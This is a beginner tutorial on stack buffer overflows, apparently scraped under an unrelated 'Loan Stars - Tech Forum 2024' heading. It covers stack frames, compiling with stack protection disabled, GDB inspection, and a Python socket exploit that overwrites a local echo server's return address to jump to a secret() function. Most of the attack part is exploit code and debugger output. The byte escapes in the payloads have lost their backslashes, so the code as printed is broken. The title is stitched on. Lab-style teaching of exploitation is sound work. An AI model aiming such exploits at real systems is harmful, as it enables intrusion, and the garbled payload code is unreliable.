Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Buffer overflow tutorial
1. Buffer Overflow Tutorial 1
This document aims to teach people how to create a piece of data that can alter the flow of a program in such a way
that it behaves in a way for which it was not intended . To begin this lesson you need an understanding of how a
function is called in a computer application written in the C programming language. A group of machine instructions
combined together, which serve a single purpose is called a “function” or sometimes a “method”. When a
programmer creates a function, the name of the function is usually the decision of the programmer, unless the
function was acquired by some other means. These instructions are written in a readable language called the C
programming language. When the programmer has finished writing the application, they will run it through a
program that is an advanced find-and-replace tool. This tool converts the human readable programming language
into machine code and then structures it into a file format suitable for various operating systems. Two of the most
well file formats are called the Windows Portable Executable (PE) and the Linux Executable and Linkable Format
(ELF).
When an ELF or a PE file is executed, the file is loaded into RAM where it is assigned a memory range for its Stack
and its Heap. The Heap memory is for storing data which is assigned a memory address at runtime (for example
data stored in a variable created using the malloc() function). The stack is used for storing variables whose memory
address is pre-calculated before the program is executed. When a child function is called, the CPU creates a new
logical block in the stack called a stack frame. The first piece of information put onto the stack frame is the memory
address of the parent instruction that called the child function. This memory address has been incremented by one
so that it points to the next instruction, to prevent returning to the calling instruction and getting stuck in an infinite
loop. When the child function has completed, it pops all the data off the stack frame until it reaches the last
instruction which is the return address pointing back to the parent function. By grouping variables and return
addresses into the same location in memory we can begin to create our buffer overflow and stack overflow attack.
By overfilling the variables with data, this causes our application to write into the memory beside the variables
which means we can modify the return address.
Imagine a situation where an application calls a function that is vulnerable to a buffer overflow attack. After calling
the vulnerable function, the application tests if a condition is true (using a secret rule). From the attackers point of
view, the secret condition is not important. However the instructions that would be executed if the condition is true,
are the target for an attack. To do this the attacker must overflow the buffer in the vulnerable function and must write
a memory address into the buffer which overwrites the return address at the bottom of the stack frame. This
address should not point at the condition, but it should point at the first instruction that would be executed if the
condition were true.
To start you compile and run the program, it opens a network socket on a port number supplied in the parameter
and waits for a connection. When a network connection is initiated, it echos back whatever is sent.
To compile the program on a 64bit machine running Linux use the following command.:
gcc -fno-stack-protector -mpreferred-stack-boundary=4 -ggdb program.c -o a.out
To run the program you can type:
. /a.out 8080
To connect to the program you can use telnet, but it will not permit you to type non-printable characters outside of
the ASCII range. Non-printable character are necessary to write a return address in binary.
telnet localhost 8080
2. Alternatively, if you do not wish to use telnet and would like to use a script here is an example in python (note the
memory addresses on Intel CPUs are in little endian format):
import socket
host = "localhost"
port = 8080
size = 30
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send("AAAAAAAx00")
data = s.recv(size)
s.close()
print data
There is also a better way to execute your application than “./a.out 8080”. If you launch your application inside a
debugger such as GDB you can add breakpoints to pause execution, you can see the instructions, you can see the
memory addresses of the instructions and you can see your stack frame.
gdb ./a.out
Inside GDB the following commands are useful to know.
disas HandleTCPClient
Disassemble the function “HandleTCPClient”
disas vulnerable
Disassemble the function “vulnerable”
set args 8080
Set the program arguments to “8080”
break *0x1234567
Set a breakpoint to pause execution at memory
address “1234567”. Hint: try setting this to the last
instruction in the vulnerable function.
break main
Set a breakpoint at the main function
run
Execute the program until a breakpoint is reached
step
Execute the next instruction in the executable
info frame
Display the current stack frame information. Try
doing this when you a the breakpoint.
x/128xb $rsp
Display 128 bytes of memory in hexadecimal
($rsp is the stack pointer, sometimes $esp).
print variable
Display value of variable
continue
Continue executing the program until the next
breakpoint is reached.
kill
Terminate the application without exiting the
debugger
quit
Exit the GDB application
To disassemble the executable outside the debugger try: objdump -d ./a.out > output.txt
Note: If you kill the program mid execution, then it may hold the listening port in a waiting state for approximately 55
seconds. This timeout can be monitored using the command :
sudo watch -n 0 netstat -tunpal
3. The trick to creating an exploit for the application is to create a long string with the virtual address of the instruction
we want to jump to. This virtual address should be appended to the end of the buffer so that it overwrites the return
address at the bottom of the stack frame. To find this address run the following command:
gdb ./a.out 8080
(gdb) disas HandleTCPClient
It should give the following output:
0x0000000000400bf3 <+74>: callq 0x400b6a <vulnerable>
0x0000000000400bf8 <+79>: lea -0x40(%rbp),%rax
0x0000000000400bfc <+83>: mov $0x400e59,%esi
0x0000000000400c01 <+88>: mov %rax,%rdi
0x0000000000400c04 <+91>: callq 0x4008a8 <strcmp@plt>
0x0000000000400c09 <+96>: test %eax,%eax
0x0000000000400c0b <+98>: jne 0x400c17 <HandleTCPClient+110>
0x0000000000400c0d <+100>: mov $0x0,%eax
0x0000000000400c12 <+105>: callq 0x400b99 <secret>
Notice the address of the line that executes the function secret() is “400c12”. Lets append this memory address to
our python exploit. You will need to customize the address for your own system.
import socket
host = "localhost"
port = 8080
size = 30
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send("AAAAAAAAAAAAAAAAAAAAAAAAx12x0cx40x00x00")
data = s.recv(size)
s.close()
print data
Run the exploit using the following command:
python pycracker.py
The server should output the following lines:
Talking with client 127.0.0.1
This application has been cracked!
Bus error